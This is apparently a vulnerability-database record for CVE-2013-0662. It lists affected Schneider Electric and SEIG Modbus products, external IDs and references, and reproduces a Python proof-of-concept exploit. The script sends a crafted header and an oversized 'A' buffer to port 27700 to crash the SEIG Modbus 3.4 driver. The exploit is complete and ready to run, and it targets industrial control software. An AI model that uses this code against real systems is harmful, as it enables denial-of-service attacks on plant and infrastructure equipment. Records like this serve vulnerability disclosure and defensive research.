ID
VAR-E-201403-0100
CVE
| cve_id: | CVE-2013-0662 | Trust: 2.9 |
EDB ID
45219
TITLE
SEIG Modbus 3.4 - Denial of Service (PoC) - Windows_x86 dos Exploit
Trust: 0.6
DESCRIPTION
SEIG Modbus 3.4 - Denial of Service (PoC). CVE-2013-0662 . dos exploit for Windows_x86 platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | seig | model: | modbus | scope: | eq | version: | 3.4 | Trust: 3.8 |
| vendor: | schneider | model: | electric unity pro | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | schneider | model: | electric unity pro | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | schneider | model: | electric opc factory server | scope: | eq | version: | 3.34 | Trust: 0.3 |
| vendor: | schneider | model: | electric opc factory driver | scope: | eq | version: | 3.34 | Trust: 0.3 |
EXPLOIT
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
import time
ip = "192.168.127.137"
port = 27700
con = (ip, port)
header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"
header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service (PoC)
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | Denial of Service (DoS) | Trust: 1.0 |
| tag: | denial of service | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
Alejandro Parodi
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-0662 | Trust: 4.1 |
| db: | EXPLOIT-DB | id: | 45219 | Trust: 1.6 |
| db: | EDBNET | id: | 98951 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 30924 | Trust: 0.6 |
| db: | EDBNET | id: | 98991 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 30923 | Trust: 0.6 |
| db: | EDBNET | id: | 98990 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 149000 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 148995 | Trust: 0.5 |
| db: | BID | id: | 66500 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-0662 | Trust: 2.6 |
| url: | https://www.exploit-db.com/exploits/45219/ | Trust: 0.6 |
| url: | https://0day.today/exploits/30924 | Trust: 0.6 |
| url: | https://0day.today/exploits/30923 | Trust: 0.6 |
| url: | http://www.schneider-electric.com/site/home/index.cfm/ww/?selectcountry=true | Trust: 0.3 |
SOURCES
| db: | BID | id: | 66500 |
| db: | PACKETSTORM | id: | 149000 |
| db: | PACKETSTORM | id: | 148995 |
| db: | EXPLOIT-DB | id: | 45219 |
| db: | EDBNET | id: | 98951 |
| db: | EDBNET | id: | 98991 |
| db: | EDBNET | id: | 98990 |
LAST UPDATE DATE
2022-07-27T09:18:50.368000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 66500 | date: | 2015-03-19T09:42:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 66500 | date: | 2014-03-27T00:00:00 |
| db: | PACKETSTORM | id: | 149000 | date: | 2018-08-20T16:53:07 |
| db: | PACKETSTORM | id: | 148995 | date: | 2018-08-20T16:47:30 |
| db: | EXPLOIT-DB | id: | 45219 | date: | 2018-08-20T00:00:00 |
| db: | EDBNET | id: | 98951 | date: | 2018-08-20T00:00:00 |
| db: | EDBNET | id: | 98991 | date: | 2018-08-24T00:00:00 |
| db: | EDBNET | id: | 98990 | date: | 2018-08-24T00:00:00 |